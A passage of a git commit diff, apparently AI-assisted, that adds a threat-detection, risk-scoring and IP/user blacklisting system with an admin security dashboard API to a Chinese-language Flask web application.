feat: 实现完整安全防护系统

Phase 1 - 威胁检测引擎:
- security/threat_detector.py: JNDI/SQL/XSS/路径遍历/命令注入检测
- security/constants.py: 威胁检测规则和评分常量
- 数据库表: threat_events, ip_risk_scores, user_risk_scores, ip_blacklist

Phase 2 - 风险评分与黑名单:
- security/risk_scorer.py: IP/用户风险评分引擎,支持分数衰减
- security/blacklist.py: 黑名单管理,自动封禁规则

Phase 3 - 响应策略:
- security/honeypot.py: 蜜罐响应生成器
- security/response_handler.py: 渐进式响应策略

Phase 4 - 集成:
- security/middleware.py: Flask安全中间件
- routes/admin_api/security.py: 管理后台安全仪表板API
- 36个测试用例全部通过

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
2025-12-27 01:28:38 +08:00
parent e3b0c35da6
commit 46253337eb
24 changed files with 3219 additions and 4 deletions

4
app.py
View File

@@ -32,6 +32,7 @@ from browser_pool_worker import init_browser_worker_pool, shutdown_browser_worke
from realtime.socketio_handlers import register_socketio_handlers from realtime.socketio_handlers import register_socketio_handlers
from realtime.status_push import status_push_worker from realtime.status_push import status_push_worker
from routes import register_blueprints from routes import register_blueprints
from security import init_security_middleware
from services.browser_manager import init_browser_manager from services.browser_manager import init_browser_manager
from services.checkpoints import init_checkpoint_manager from services.checkpoints import init_checkpoint_manager
from services.maintenance import start_cleanup_scheduler from services.maintenance import start_cleanup_scheduler
@@ -98,6 +99,9 @@ init_logging(log_level=config.LOG_LEVEL, log_file=config.LOG_FILE)
logger = get_logger("app") logger = get_logger("app")
init_runtime(socketio=socketio, logger=logger) init_runtime(socketio=socketio, logger=logger)
# 初始化安全中间件(需在其他中间件/Blueprint 之前注册)
init_security_middleware(app)
# 注册 Blueprint路由不变 # 注册 Blueprint路由不变
register_blueprints(app) register_blueprints(app)

View File

@@ -206,6 +206,10 @@ class Config:
LOGIN_ALERT_ENABLED = os.environ.get('LOGIN_ALERT_ENABLED', 'true').lower() == 'true' LOGIN_ALERT_ENABLED = os.environ.get('LOGIN_ALERT_ENABLED', 'true').lower() == 'true'
LOGIN_ALERT_MIN_INTERVAL_SECONDS = int(os.environ.get('LOGIN_ALERT_MIN_INTERVAL_SECONDS', '3600')) LOGIN_ALERT_MIN_INTERVAL_SECONDS = int(os.environ.get('LOGIN_ALERT_MIN_INTERVAL_SECONDS', '3600'))
ADMIN_REAUTH_WINDOW_SECONDS = int(os.environ.get('ADMIN_REAUTH_WINDOW_SECONDS', '600')) ADMIN_REAUTH_WINDOW_SECONDS = int(os.environ.get('ADMIN_REAUTH_WINDOW_SECONDS', '600'))
SECURITY_ENABLED = os.environ.get('SECURITY_ENABLED', 'true').lower() == 'true'
SECURITY_LOG_LEVEL = os.environ.get('SECURITY_LOG_LEVEL', 'INFO')
HONEYPOT_ENABLED = os.environ.get('HONEYPOT_ENABLED', 'true').lower() == 'true'
AUTO_BAN_ENABLED = os.environ.get('AUTO_BAN_ENABLED', 'true').lower() == 'true'
@classmethod @classmethod
def validate(cls): def validate(cls):
@@ -234,6 +238,9 @@ class Config:
if cls.LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']: if cls.LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
errors.append(f"LOG_LEVEL无效: {cls.LOG_LEVEL}") errors.append(f"LOG_LEVEL无效: {cls.LOG_LEVEL}")
if cls.SECURITY_LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
errors.append(f"SECURITY_LOG_LEVEL无效: {cls.SECURITY_LOG_LEVEL}")
return errors return errors
@classmethod @classmethod

View File

@@ -121,7 +121,7 @@ config = get_config()
DB_FILE = config.DB_FILE DB_FILE = config.DB_FILE
# 数据库版本 (用于迁移管理) # 数据库版本 (用于迁移管理)
DB_VERSION = 12 DB_VERSION = 14
# ==================== 系统配置缓存P1 / O-03 ==================== # ==================== 系统配置缓存P1 / O-03 ====================

View File

@@ -72,6 +72,12 @@ def migrate_database(conn, target_version: int) -> None:
if current_version < 12: if current_version < 12:
_migrate_to_v12(conn) _migrate_to_v12(conn)
current_version = 12 current_version = 12
if current_version < 13:
_migrate_to_v13(conn)
current_version = 13
if current_version < 14:
_migrate_to_v14(conn)
current_version = 14
if current_version != int(target_version): if current_version != int(target_version):
set_current_version(conn, int(target_version)) set_current_version(conn, int(target_version))
@@ -519,3 +525,117 @@ def _migrate_to_v12(conn):
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)")
conn.commit() conn.commit()
def _migrate_to_v13(conn):
"""迁移到版本13 - 安全防护:威胁检测相关表"""
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
threat_type TEXT NOT NULL,
score INTEGER NOT NULL DEFAULT 0,
rule TEXT,
field_name TEXT,
matched TEXT,
value_preview TEXT,
ip TEXT,
user_id INTEGER,
request_method TEXT,
request_path TEXT,
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_risk_scores (
ip TEXT PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_risk_scores (
user_id INTEGER PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_blacklist (
ip TEXT PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_signatures (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
threat_type TEXT NOT NULL,
pattern TEXT NOT NULL,
pattern_type TEXT DEFAULT 'regex',
score INTEGER DEFAULT 0,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)")
conn.commit()
def _migrate_to_v14(conn):
"""迁移到版本14 - 安全防护:用户黑名单表"""
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
conn.commit()

View File

@@ -72,6 +72,101 @@ def ensure_schema(conn) -> None:
""" """
) )
# ==================== 安全防护:威胁检测相关表 ====================
# 威胁事件日志表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
threat_type TEXT NOT NULL,
score INTEGER NOT NULL DEFAULT 0,
rule TEXT,
field_name TEXT,
matched TEXT,
value_preview TEXT,
ip TEXT,
user_id INTEGER,
request_method TEXT,
request_path TEXT,
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# IP风险评分表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_risk_scores (
ip TEXT PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
# 用户风险评分表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_risk_scores (
user_id INTEGER PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# IP黑名单表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_blacklist (
ip TEXT PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
# 用户黑名单表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# 威胁特征库表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_signatures (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
threat_type TEXT NOT NULL,
pattern TEXT NOT NULL,
pattern_type TEXT DEFAULT 'regex',
score INTEGER DEFAULT 0,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
# 账号表(关联用户) # 账号表(关联用户)
cursor.execute( cursor.execute(
""" """
@@ -271,6 +366,26 @@ def ensure_schema(conn) -> None:
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_fingerprints_user ON login_fingerprints(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_fingerprints_user ON login_fingerprints(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_user_id ON accounts(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_user_id ON accounts(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_username ON accounts(username)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_username ON accounts(username)")

View File

@@ -2,10 +2,12 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from __future__ import annotations from __future__ import annotations
from datetime import timedelta
from typing import Any, Optional
from typing import Dict from typing import Dict
import db_pool import db_pool
from db.utils import get_cst_now_str from db.utils import get_cst_now, get_cst_now_str
def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict[str, bool]: def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict[str, bool]:
@@ -74,3 +76,217 @@ def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict
conn.commit() conn.commit()
return {"new_device": new_device, "new_ip": new_ip} return {"new_device": new_device, "new_ip": new_ip}
def get_threat_events_count(hours: int = 24) -> int:
"""获取指定时间内的威胁事件数。"""
try:
hours_int = max(0, int(hours))
except Exception:
hours_int = 24
if hours_int <= 0:
return 0
start_time = (get_cst_now() - timedelta(hours=hours_int)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT COUNT(*) AS cnt FROM threat_events WHERE created_at >= ?", (start_time,))
row = cursor.fetchone()
try:
return int(row["cnt"] if row else 0)
except Exception:
return 0
def _build_threat_events_where_clause(filters: Optional[dict]) -> tuple[str, list[Any]]:
clauses: list[str] = []
params: list[Any] = []
if not isinstance(filters, dict):
return "", []
event_type = filters.get("event_type") or filters.get("threat_type")
if event_type:
raw = str(event_type).strip()
types = [t.strip()[:64] for t in raw.split(",") if t.strip()]
if len(types) == 1:
clauses.append("threat_type = ?")
params.append(types[0])
elif types:
placeholders = ", ".join(["?"] * len(types))
clauses.append(f"threat_type IN ({placeholders})")
params.extend(types)
severity = filters.get("severity")
if severity is not None and str(severity).strip():
sev = str(severity).strip().lower()
if "-" in sev:
parts = [p.strip() for p in sev.split("-", 1)]
try:
min_score = int(parts[0])
max_score = int(parts[1])
clauses.append("score >= ? AND score <= ?")
params.extend([min_score, max_score])
except Exception:
pass
elif sev.isdigit():
clauses.append("score >= ?")
params.append(int(sev))
elif sev in {"high", "critical"}:
clauses.append("score >= ?")
params.append(80)
elif sev in {"medium", "med"}:
clauses.append("score >= ? AND score < ?")
params.extend([50, 80])
elif sev in {"low", "info"}:
clauses.append("score < ?")
params.append(50)
ip = filters.get("ip")
if ip is not None and str(ip).strip():
ip_text = str(ip).strip()[:64]
clauses.append("ip = ?")
params.append(ip_text)
user_id = filters.get("user_id")
if user_id is not None and str(user_id).strip():
try:
user_id_int = int(user_id)
except Exception:
user_id_int = None
if user_id_int is not None:
clauses.append("user_id = ?")
params.append(user_id_int)
if not clauses:
return "", []
return " WHERE " + " AND ".join(clauses), params
def get_threat_events_list(page: int, per_page: int, filters: Optional[dict] = None) -> dict:
"""分页获取威胁事件。"""
try:
page_i = max(1, int(page))
except Exception:
page_i = 1
try:
per_page_i = int(per_page)
except Exception:
per_page_i = 20
per_page_i = max(1, min(200, per_page_i))
where_sql, params = _build_threat_events_where_clause(filters)
offset = (page_i - 1) * per_page_i
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(f"SELECT COUNT(*) AS cnt FROM threat_events{where_sql}", tuple(params))
row = cursor.fetchone()
total = int(row["cnt"]) if row else 0
cursor.execute(
f"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
{where_sql}
ORDER BY created_at DESC, id DESC
LIMIT ? OFFSET ?
""",
tuple(params + [per_page_i, offset]),
)
items = [dict(r) for r in cursor.fetchall()]
return {"page": page_i, "per_page": per_page_i, "total": total, "items": items, "filters": filters or {}}
def get_ip_threat_history(ip: str, limit: int = 50) -> list[dict]:
"""获取IP的威胁历史最近limit条"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return []
try:
limit_i = max(1, min(200, int(limit)))
except Exception:
limit_i = 50
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
WHERE ip = ?
ORDER BY created_at DESC, id DESC
LIMIT ?
""",
(ip_text, limit_i),
)
return [dict(r) for r in cursor.fetchall()]
def get_user_threat_history(user_id: int, limit: int = 50) -> list[dict]:
"""获取用户的威胁历史最近limit条"""
if user_id is None:
return []
try:
user_id_int = int(user_id)
except Exception:
return []
try:
limit_i = max(1, min(200, int(limit)))
except Exception:
limit_i = 50
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
WHERE user_id = ?
ORDER BY created_at DESC, id DESC
LIMIT ?
""",
(user_id_int, limit_i),
)
return [dict(r) for r in cursor.fetchall()]

View File

@@ -5,6 +5,7 @@ from __future__ import annotations
def register_blueprints(app) -> None: def register_blueprints(app) -> None:
from routes.admin_api import admin_api_bp from routes.admin_api import admin_api_bp
from routes.admin_api import security_bp as admin_security_bp
from routes.api_accounts import api_accounts_bp from routes.api_accounts import api_accounts_bp
from routes.api_auth import api_auth_bp from routes.api_auth import api_auth_bp
from routes.api_schedules import api_schedules_bp from routes.api_schedules import api_schedules_bp
@@ -21,3 +22,6 @@ def register_blueprints(app) -> None:
app.register_blueprint(api_screenshots_bp) app.register_blueprint(api_screenshots_bp)
app.register_blueprint(api_schedules_bp) app.register_blueprint(api_schedules_bp)
app.register_blueprint(admin_api_bp) app.register_blueprint(admin_api_bp)
# Security admin APIs (support both /api/admin/* and /yuyx/api/admin/*)
app.register_blueprint(admin_security_bp)
app.register_blueprint(admin_security_bp, url_prefix="/yuyx", name="admin_security_yuyx")

View File

@@ -9,3 +9,6 @@ admin_api_bp = Blueprint("admin_api", __name__, url_prefix="/yuyx/api")
# Import side effects: register routes on blueprint # Import side effects: register routes on blueprint
from routes.admin_api import core as _core # noqa: F401 from routes.admin_api import core as _core # noqa: F401
from routes.admin_api import update as _update # noqa: F401 from routes.admin_api import update as _update # noqa: F401
# Export security blueprint for app registration
from routes.admin_api.security import security_bp # noqa: F401

View File

@@ -0,0 +1,334 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from typing import Any
from flask import Blueprint, jsonify, request
import db_pool
from db import security as security_db
from routes.decorators import admin_required
from security import BlacklistManager, RiskScorer
security_bp = Blueprint("admin_security", __name__)
blacklist = BlacklistManager()
scorer = RiskScorer(blacklist_manager=blacklist)
def _truncate(value: Any, max_len: int = 200) -> str:
text = str(value or "")
if max_len <= 0:
return ""
if len(text) <= max_len:
return text
return text[: max(0, max_len - 3)] + "..."
def _parse_int_arg(name: str, default: int, *, min_value: int | None = None, max_value: int | None = None) -> int:
raw = request.args.get(name, None)
if raw is None or str(raw).strip() == "":
value = int(default)
else:
try:
value = int(str(raw).strip())
except Exception:
value = int(default)
if min_value is not None:
value = max(int(min_value), value)
if max_value is not None:
value = min(int(max_value), value)
return value
def _parse_json() -> dict:
if request.is_json:
data = request.get_json(silent=True) or {}
return data if isinstance(data, dict) else {}
# 兼容 form-data
try:
return dict(request.form or {})
except Exception:
return {}
def _parse_bool(value: Any) -> bool:
if isinstance(value, bool):
return value
if isinstance(value, int):
return value != 0
text = str(value or "").strip().lower()
return text in {"1", "true", "yes", "y", "on"}
def _sanitize_threat_event(event: dict) -> dict:
return {
"id": event.get("id"),
"threat_type": event.get("threat_type") or "unknown",
"score": int(event.get("score") or 0),
"ip": _truncate(event.get("ip"), 64),
"user_id": event.get("user_id"),
"request_method": _truncate(event.get("request_method"), 16),
"request_path": _truncate(event.get("request_path"), 256),
"field_name": _truncate(event.get("field_name"), 80),
"rule": _truncate(event.get("rule"), 120),
"matched": _truncate(event.get("matched"), 120),
"value_preview": _truncate(event.get("value_preview"), 200),
"created_at": event.get("created_at"),
}
def _sanitize_ban_entry(entry: dict, *, kind: str) -> dict:
if kind == "ip":
return {
"ip": _truncate(entry.get("ip"), 64),
"reason": _truncate(entry.get("reason"), 200),
"added_at": entry.get("added_at"),
"expires_at": entry.get("expires_at"),
"is_active": int(entry.get("is_active") or 0),
}
if kind == "user":
return {
"user_id": entry.get("user_id"),
"reason": _truncate(entry.get("reason"), 200),
"added_at": entry.get("added_at"),
"expires_at": entry.get("expires_at"),
"is_active": int(entry.get("is_active") or 0),
}
return {}
@security_bp.route("/api/admin/security/dashboard", methods=["GET"])
@admin_required
def get_security_dashboard():
"""
获取安全仪表板数据
返回:
- 最近24小时威胁事件数
- 当前封禁IP数
- 当前封禁用户数
- 最近10条威胁事件
"""
try:
threat_24h = security_db.get_threat_events_count(hours=24)
except Exception:
threat_24h = 0
try:
banned_ips = blacklist.get_banned_ips()
except Exception:
banned_ips = []
try:
banned_users = blacklist.get_banned_users()
except Exception:
banned_users = []
try:
recent = security_db.get_threat_events_list(page=1, per_page=10, filters={}).get("items", [])
recent_items = [_sanitize_threat_event(e) for e in recent if isinstance(e, dict)]
except Exception:
recent_items = []
return jsonify(
{
"threat_events_24h": int(threat_24h or 0),
"banned_ip_count": len(banned_ips),
"banned_user_count": len(banned_users),
"recent_threat_events": recent_items,
}
)
@security_bp.route("/api/admin/security/threats", methods=["GET"])
@admin_required
def get_threat_events():
"""
获取威胁事件列表(分页)
参数: page, per_page, severity, event_type
"""
page = _parse_int_arg("page", 1, min_value=1, max_value=100000)
per_page = _parse_int_arg("per_page", 20, min_value=1, max_value=200)
severity = (request.args.get("severity") or "").strip()
event_type = (request.args.get("event_type") or "").strip()
filters: dict[str, Any] = {}
if severity:
filters["severity"] = severity
if event_type:
filters["event_type"] = event_type
data = security_db.get_threat_events_list(page, per_page, filters)
items = data.get("items") or []
data["items"] = [_sanitize_threat_event(e) for e in items if isinstance(e, dict)]
return jsonify(data)
@security_bp.route("/api/admin/security/banned-ips", methods=["GET"])
@admin_required
def get_banned_ips():
"""获取封禁IP列表"""
items = blacklist.get_banned_ips()
return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="ip") for x in items]})
@security_bp.route("/api/admin/security/banned-users", methods=["GET"])
@admin_required
def get_banned_users():
"""获取封禁用户列表"""
items = blacklist.get_banned_users()
return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="user") for x in items]})
@security_bp.route("/api/admin/security/ban-ip", methods=["POST"])
@admin_required
def ban_ip():
"""
手动封禁IP
参数: ip, reason, duration_hours(可选), permanent(可选)
"""
data = _parse_json()
ip = str(data.get("ip") or "").strip()
reason = str(data.get("reason") or "").strip()
duration_hours_raw = data.get("duration_hours", 24)
permanent = _parse_bool(data.get("permanent", False))
if not ip:
return jsonify({"error": "ip不能为空"}), 400
if not reason:
return jsonify({"error": "reason不能为空"}), 400
try:
duration_hours = max(1, int(duration_hours_raw))
except Exception:
duration_hours = 24
ok = blacklist.ban_ip(ip, reason, duration_hours=duration_hours, permanent=permanent)
if not ok:
return jsonify({"error": "封禁失败"}), 400
return jsonify({"success": True})
@security_bp.route("/api/admin/security/unban-ip", methods=["POST"])
@admin_required
def unban_ip():
"""解除IP封禁"""
data = _parse_json()
ip = str(data.get("ip") or "").strip()
if not ip:
return jsonify({"error": "ip不能为空"}), 400
ok = blacklist.unban_ip(ip)
if not ok:
return jsonify({"error": "未找到封禁记录"}), 404
return jsonify({"success": True})
@security_bp.route("/api/admin/security/ban-user", methods=["POST"])
@admin_required
def ban_user():
"""手动封禁用户"""
data = _parse_json()
user_id_raw = data.get("user_id")
reason = str(data.get("reason") or "").strip()
duration_hours_raw = data.get("duration_hours", 24)
permanent = _parse_bool(data.get("permanent", False))
try:
user_id = int(user_id_raw)
except Exception:
user_id = None
if user_id is None:
return jsonify({"error": "user_id不能为空"}), 400
if not reason:
return jsonify({"error": "reason不能为空"}), 400
try:
duration_hours = max(1, int(duration_hours_raw))
except Exception:
duration_hours = 24
ok = blacklist._ban_user_internal(user_id, reason=reason, duration_hours=duration_hours, permanent=permanent)
if not ok:
return jsonify({"error": "封禁失败"}), 400
return jsonify({"success": True})
@security_bp.route("/api/admin/security/unban-user", methods=["POST"])
@admin_required
def unban_user():
"""解除用户封禁"""
data = _parse_json()
user_id_raw = data.get("user_id")
try:
user_id = int(user_id_raw)
except Exception:
user_id = None
if user_id is None:
return jsonify({"error": "user_id不能为空"}), 400
ok = blacklist.unban_user(user_id)
if not ok:
return jsonify({"error": "未找到封禁记录"}), 404
return jsonify({"success": True})
@security_bp.route("/api/admin/security/ip-risk/<ip>", methods=["GET"])
@admin_required
def get_ip_risk(ip):
"""获取指定IP的风险评分和历史事件"""
ip_text = str(ip or "").strip()
if not ip_text:
return jsonify({"error": "ip不能为空"}), 400
history = security_db.get_ip_threat_history(ip_text)
return jsonify(
{
"ip": _truncate(ip_text, 64),
"risk_score": int(scorer.get_ip_score(ip_text) or 0),
"is_banned": bool(blacklist.is_ip_banned(ip_text)),
"threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)],
}
)
@security_bp.route("/api/admin/security/user-risk/<int:user_id>", methods=["GET"])
@admin_required
def get_user_risk(user_id):
"""获取指定用户的风险评分和历史事件"""
history = security_db.get_user_threat_history(user_id)
return jsonify(
{
"user_id": int(user_id),
"risk_score": int(scorer.get_user_score(user_id) or 0),
"is_banned": bool(blacklist.is_user_banned(user_id)),
"threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)],
}
)
@security_bp.route("/api/admin/security/cleanup", methods=["POST"])
@admin_required
def cleanup_expired():
"""清理过期的封禁记录和衰减风险分"""
try:
blacklist.cleanup_expired()
except Exception:
pass
try:
scorer.decay_scores()
except Exception:
pass
# 可选:返回当前连接池统计信息,便于排查后台运行状态
pool_stats = None
try:
pool_stats = db_pool.get_pool_stats()
except Exception:
pool_stats = None
return jsonify({"success": True, "pool_stats": pool_stats})

View File

@@ -14,11 +14,20 @@ def admin_required(f):
@wraps(f) @wraps(f)
def decorated_function(*args, **kwargs): def decorated_function(*args, **kwargs):
try:
logger = get_logger() logger = get_logger()
except Exception:
import logging
logger = logging.getLogger("app")
logger.debug(f"[admin_required] 检查会话admin_id存在: {'admin_id' in session}") logger.debug(f"[admin_required] 检查会话admin_id存在: {'admin_id' in session}")
if "admin_id" not in session: if "admin_id" not in session:
logger.warning(f"[admin_required] 拒绝访问 {request.path} - session中无admin_id") logger.warning(f"[admin_required] 拒绝访问 {request.path} - session中无admin_id")
is_api = request.blueprint == "admin_api" or request.path.startswith("/yuyx/api") is_api = (
request.blueprint in {"admin_api", "admin_security", "admin_security_yuyx"}
or request.path.startswith("/yuyx/api")
or request.path.startswith("/api/admin")
)
if is_api: if is_api:
return jsonify({"error": "需要管理员权限"}), 403 return jsonify({"error": "需要管理员权限"}), 403
return redirect(url_for("pages.admin_login_page")) return redirect(url_for("pages.admin_login_page"))

22
security/__init__.py Normal file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from security.blacklist import BlacklistManager
from security.honeypot import HoneypotResponder
from security.middleware import init_security_middleware
from security.response_handler import ResponseAction, ResponseHandler, ResponseStrategy
from security.risk_scorer import RiskScorer
from security.threat_detector import ThreatDetector, ThreatResult
__all__ = [
"BlacklistManager",
"HoneypotResponder",
"init_security_middleware",
"ResponseAction",
"ResponseHandler",
"ResponseStrategy",
"RiskScorer",
"ThreatDetector",
"ThreatResult",
]

255
security/blacklist.py Normal file
View File

@@ -0,0 +1,255 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import threading
from datetime import timedelta
from typing import List, Optional
import db_pool
from db.utils import get_cst_now, get_cst_now_str
class BlacklistManager:
"""黑名单管理器"""
def __init__(self) -> None:
self._schema_ready = False
self._schema_lock = threading.Lock()
def is_ip_banned(self, ip: str) -> bool:
"""检查IP是否被封禁"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT 1
FROM ip_blacklist
WHERE ip = ?
AND is_active = 1
